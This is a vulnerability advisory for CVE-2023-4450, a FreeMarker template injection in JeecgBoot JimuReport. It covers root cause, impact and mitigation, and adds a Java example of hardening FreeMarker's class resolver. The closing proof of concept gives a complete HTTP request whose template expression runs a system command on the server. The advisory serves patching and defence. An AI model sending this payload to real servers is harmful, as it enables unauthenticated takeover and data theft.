Vulnerable Version
version prior to 1.6.0
Fixed Version
Update to the latest version
Base Score
9.8 (Critical)
Vendor Description:
JeecgBoot is a Spring Boot–based low-code platform designed for rapid development of enterprise applications. JimuReport is its built-in reporting tool that allows users to design, generate, and export dynamic reports. It leverages FreeMarker, a Java-based template engine, to render report content dynamically. Together, they enable flexible and customizable report generation within JeecgBoot applications.
CVE-2023-4450 Description:
CVE-2023-4450 is a critical remote code execution vulnerability affecting JeecgBoot JimuReport up to version 1.6.0. It arises from the way the product processes user-supplied template data with the FreeMarker template engine. Specifically, the vulnerable endpoint /jeecg-boot/jmreport/queryFieldBySql accepts a user-supplied SQL query that is rendered as a FreeMarker template, and that input is parsed and executed without proper validation or sanitization. Because nothing filters the input, an attacker can embed FreeMarker expressions that the server evaluates as code. Such expressions can invoke powerful FreeMarker classes like freemarker.template.utility.Execute to run arbitrary system commands on the affected server. The issue is especially severe when the API endpoint is publicly reachable without authentication, since a remote, unauthenticated attacker can then exploit the flaw simply by sending crafted requests. In essence, the root cause is blind trust in user input combined with unrestricted template execution and a FreeMarker engine that is neither sandboxed nor limited in its capabilities. This combination yields server-side template injection and, consequently, remote code execution.
Impact of CVE-2023-4450
- Remote Code Execution: Attackers can remotely execute arbitrary system commands on vulnerable JimuReport servers, potentially taking full control of the affected systems.
- Data Breach Risk: Sensitive business data stored or processed by the JimuReport instance may be accessed, modified, or exfiltrated by attackers.
- Service Disruption: Exploitation can lead to service outages, defacement, or denial of service if attackers disrupt, delete, or alter system files and processes.
- Privilege Escalation: Malicious actors might leverage this flaw to move laterally, gain higher privileges, or compromise other systems within the same network environment.
- Widespread Attacks: If the vulnerable endpoint is exposed without authentication on the internet, it enables unauthenticated attackers to launch automated mass-exploitation campaigns across multiple organizations.
Mitigation:
- Upgrade Software: Update JimuReport to version 1.6.1 or later, where the vulnerability is patched, to prevent exploitation.
- Restrict Endpoint Access: Limit public exposure of vulnerable endpoints using network segmentation, firewalls, or VPNs so only trusted users can access the APIs.
- Input Validation: Implement strict validation and sanitization of all user-supplied data processed by the FreeMarker template engine to block injection attacks.
- Disable Dangerous Template Methods: Configure FreeMarker and related components to restrict or disable the execution of potentially dangerous utility classes such as freemarker.template.utility.Execute.
- Monitor and Audit: Continuously monitor server logs and network traffic for signs of suspicious activity or exploitation attempts, and conduct regular security assessments to identify unpatched or misconfigured systems.
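The "Disable Dangerous Template Methods" item above is the one that addresses the root cause described earlier (an unsandboxed FreeMarker engine evaluating untrusted text). The following Java snippet is an added example, not JimuReport's or FreeMarker's own code: it shows FreeMarker's default class resolver beside a hardened configuration, and renders the advisory's own `?new()` expression under the hardened one so that the rejection is visible. The class name `FreeMarkerHardeningDemo`, the helper names and the template-name string "untrusted" are assumptions for this illustration; the FreeMarker API calls (`setNewBuiltinClassResolver`, `TemplateClassResolver.ALLOWS_NOTHING_RESOLVER`, `SAFER_RESOLVER`, `setAPIBuiltinEnabled`) are the real ones from freemarker.core and freemarker.template.

```java
import java.io.StringWriter;
import java.util.Collections;
import java.util.Map;

import freemarker.core.TemplateClassResolver;
import freemarker.template.Configuration;
import freemarker.template.Template;
import freemarker.template.TemplateException;

/**
 * Added example (not project code): weak vs. hardened FreeMarker setup.
 * Class and method names here are assumptions made for the demo.
 */
public class FreeMarkerHardeningDemo {

    // Constructed sample: the expression from the POC in this advisory, as it
    // would arrive inside an untrusted "sql" value. The hardened engine must
    // refuse to instantiate the class before anything is executed.
    static final String UNTRUSTED_TEMPLATE =
        "<#assign ex=\"freemarker.template.utility.Execute\"?new()> ${ex(\"id\")}";

    /** Weak setting: FreeMarker's default lets a template instantiate any class via ?new. */
    static Configuration unrestrictedConfig() {
        Configuration cfg = new Configuration(Configuration.VERSION_2_3_32);
        // UNRESTRICTED_RESOLVER is the default; shown explicitly for contrast only.
        cfg.setNewBuiltinClassResolver(TemplateClassResolver.UNRESTRICTED_RESOLVER);
        return cfg;
    }

    /** Hardened setting: the ?new built-in cannot instantiate anything. */
    static Configuration hardenedConfig() {
        Configuration cfg = new Configuration(Configuration.VERSION_2_3_32);
        // ALLOWS_NOTHING_RESOLVER makes every ?new() call fail at render time.
        // SAFER_RESOLVER is the weaker alternative: it only blocks a short list of
        // known-dangerous classes (Execute, ObjectConstructor, JythonRuntime).
        cfg.setNewBuiltinClassResolver(TemplateClassResolver.ALLOWS_NOTHING_RESOLVER);
        // Keep the ?api built-in off (its default) so templates cannot reach
        // reflection through wrapped Java objects either.
        cfg.setAPIBuiltinEnabled(false);
        return cfg;
    }

    /** Renders templateText under cfg; throws TemplateException if the engine rejects it. */
    static String render(Configuration cfg, String templateText) throws Exception {
        Template t = new Template("untrusted", templateText, cfg);
        StringWriter out = new StringWriter();
        Map<String, Object> model = Collections.emptyMap();
        t.process(model, out);
        return out.toString();
    }

    public static void main(String[] args) throws Exception {
        try {
            render(hardenedConfig(), UNTRUSTED_TEMPLATE);
            System.out.println("UNEXPECTED: hardened config rendered the payload");
        } catch (TemplateException e) {
            // Expected path: the resolver refuses to instantiate the class, so
            // Execute is never constructed and no command runs.
            System.out.println("hardened config rejected ?new(): " + e.getMessage());
        }
        // unrestrictedConfig() is deliberately not used to render UNTRUSTED_TEMPLATE:
        // under the default resolver the same text would run the "id" command.
    }
}
```

The resolver setting is a defence-in-depth measure, not a substitute for the upgrade: it stops the `?new()` path used by this CVE, but a template that is still assembled from untrusted input remains a template injection surface, so the "Input Validation" and "Restrict Endpoint Access" items above still apply.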
POC
Send the following request to execute the FreeMarker template <#assign ex="freemarker.template.utility.Execute"?new()> ${ex("id")}:
POST /jmreport/queryFieldBySql HTTP/1.1
Host: localhost:8085
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.6312.122 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Type: application/json
Content-Length: 100

{"sql":"select 'result:<#assign ex=\"freemarker.template.utility.Execute\"?new()> ${ex(\"id\")}'" }